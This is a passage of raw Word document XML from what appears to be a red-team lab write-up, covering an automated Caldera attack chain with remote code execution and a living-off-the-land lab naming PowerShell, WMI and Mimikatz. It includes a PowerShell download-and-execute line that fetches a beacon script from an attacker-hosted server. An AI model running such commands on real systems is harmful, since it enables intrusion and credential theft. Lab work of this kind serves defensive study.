      <w:pPr>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The use of AI-driven tools to plan, execute, and adapt cyberattacks automatically, allowing attackers to move faster, target more systems, and bypass defenses.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F0">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tools Used</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F1">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Caldera - </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">it's a cybersecurity framework developed by MITRE that empowers cyber practitioners to save time, money, and energy through automated security assessments.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Red Team Automation (RTA) - </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A framework of scripts designed for blue teams to simulate malicious tradecraft and test detection capabilities based on the MITRE ATT&amp;CK framework.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F4">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Multi-Phase attack scenario</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In caldera, an adversary is a collection of TTPss that run a specific order. First, we have to create a new profile and add techniques or abilities in it which are:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Discovery or Phishing abilities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">T1190 Exploit Public-Facing Application</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ability to find files.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then save</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FA">
      <w:pPr>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Setup up another agent in the caldera by going to deploy an agent in this as well we will choose sandcat and copy the powershell command and paste it on the target specifically Windows VM here. Let’s run the Operations:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Create a new operation then select the first profile you created in it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Select group containing the active agent.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Set to “Run”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Finally we will start the operation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000100">
      <w:pPr>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000101">
      <w:pPr>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table7"/>
        <w:tblW w:w="1077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94.25"/>
        <w:gridCol w:w="2694.25"/>
        <w:gridCol w:w="2694.25"/>
        <w:gridCol w:w="2694.25"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2694.25"/>
            <w:gridCol w:w="2694.25"/>
            <w:gridCol w:w="2694.25"/>
            <w:gridCol w:w="2694.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51c2b"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="151c2b"/>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51c2b"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="151c2b"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">TTP</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51c2b"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="151c2b"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Tool 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51c2b"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="151c2b"/>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51c2b"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="151c2b"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Exploitation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51c2b"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="151c2b"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">T1190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51c2b"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="151c2b"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Caldera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51c2b"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="151c2b"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Successfully executed automated Remote Code Execution (RCE) via a known vulnerability in a lab-hosted web service.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Leveraged CALDERA to orchestrate a multi-phase attack chain, automating the transition from initial discovery to exploitation. By utilizing a pre-configured adversary profile, the operation successfully executed T1190 for Remote Code Execution. This demonstrated how automated orchestration reduces attacker dwell time and highlights the necessity for rapid, automated blue team detection responses.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010C">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>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keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="151c2b"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010E">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="151c2b"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Living-off-the-land Lab</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010F">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LotL attack is a cyberattack technique where intruders use legitimate, pre-installed software and administrative tools within a system to perform malicious actions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000110">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000111">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tools Used</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000112">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PowerShell - </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A cross-platform task automation solution made by Microsoft, consisting of a command-line shell, a scripting language, and a configuration management framework.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000113">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">WMI - </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A command-line client used for interacting with WMI services. It is commonly used for remote command execution and system enumeration.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000114">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Mimikatz - </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">open-source post-exploitation tool designed to extract plain-text passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000115">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000116">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Executing attacks and harvesting credentials</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000117">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Setting up a script for which i am going to use the same beacon.ps1 i used previously then “python3 -m http.server 80”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000118">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Execute the target on the Windows by “IEX (New-Object Net.WebClient).DownloadString(‘</w:t>
      </w:r>
      <w:hyperlink r:id="rId11">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://192.168.204.130/beacon.ps1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">’).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000119">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IEX is Invoke-Expression which tells powershell to run whatever text it just downloaded as a command.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011A">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table8"/>
        <w:tblW w:w="1077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94.25"/>
        <w:gridCol w:w="2694.25"/>
        <w:gridCol w:w="2694.25"/>
        <w:gridCol w:w="2694.25"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2694.25"/>
            <w:gridCol w:w="2694.25"/>
            <w:gridCol w:w="2694.25"/>
            <w:gridCol w:w="2694.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51c2b"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="151c2b"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Attack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51c2b"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="151c2b"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">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51c2b"/>
              </w:rPr>
            </w:pPr>
